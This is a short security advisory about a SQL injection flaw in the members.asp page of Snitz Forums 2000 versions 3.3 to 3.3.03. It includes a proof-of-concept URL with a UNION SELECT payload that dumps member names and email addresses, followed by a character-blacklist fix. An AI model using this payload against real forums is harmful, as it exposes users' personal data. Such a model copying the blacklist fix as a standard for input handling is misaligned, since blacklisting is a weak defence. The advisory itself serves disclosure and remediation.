COMMAND

	Snitz Forums 2000 remote SQL query manipulation vulnerability

SYSTEMS AFFECTED

	Snitz Forums 2000 version : 3.3,3.3.01,3.3.02,3.3.03

PROBLEM

	acemi posted :
	

	In members.asp page, when listing  the  members  with  a  criteria,  the
	input (M_NAME) is not checked  for  malicious  code.  As  a  result,  an
	attacker can add extra SELECT statement to  the  query  with  UNION  and
	he/she can view any data in the forum\'s database.
	

	

	 Proof-of-concept

	 ----------------

	

	Normally, to view the members\' list whose membername start with  \'A\',
	members.asp page is used as the following:
	

	/members.asp?

	mode=search&M_NAME=A&initial=1&method=

	

	Use this link to view the vulnerability:
	

	/members.asp?mode=search&M_NAME=XXXX%

	25\')%20UNION%20SELECT%20MEMBER_ID,%

	20M_STATUS,%20M_NAME%20%2B%20\'/\'%20%

	2B%20M_EMAIL%20%2B%20\'/\',%20M_LEVEL,%

	20M_EMAIL,%20M_COUNTRY,%

	20M_HOMEPAGE,%20M_ICQ,%20M_YAHOO,%

	20M_AIM,%20M_TITLE,%20M_POSTS,%

	20M_LASTPOSTDATE,%20M_LASTHEREDATE,%

	20M_DATE,%20M_STATE%20FROM%

	20FORUM_MEMBERS%20WHERE%20(M_NAME%

	20LIKE%20\'&initial=1&method=

	

	MEMBERNAME column will be MEMBERNAME/EMAIL/ column.

SOLUTION

	To fix this bug, in members.asp , change the following lines :
	

	SearchName = Request(\"M_NAME\")

	if SearchName = \"\" then

	SearchName = Request.Form(\"M_NAME\")

	end if

	

	with :
	

	if IsValidString(Request(\"M_NAME\")) then

	SearchName = Request(\"M_NAME\")

	end if

	

	if SearchName = \"\" then

	if IsValidString(Request.Form(\"M_NAME\")) then

	SearchName = Request.Form(\"M_NAME\")

	end if

	end if

	

	and in function IsValidString(sValidate) in inc_functions.asp  ,  change
	the following line:
	

	sInvalidChars = \"!#$%^&*()=+{}[]|\\;:/?>,<\"

	

	with :
	

	sInvalidChars = \"!#$%^&*()=+{}[]|\\;:/?>,<\'\"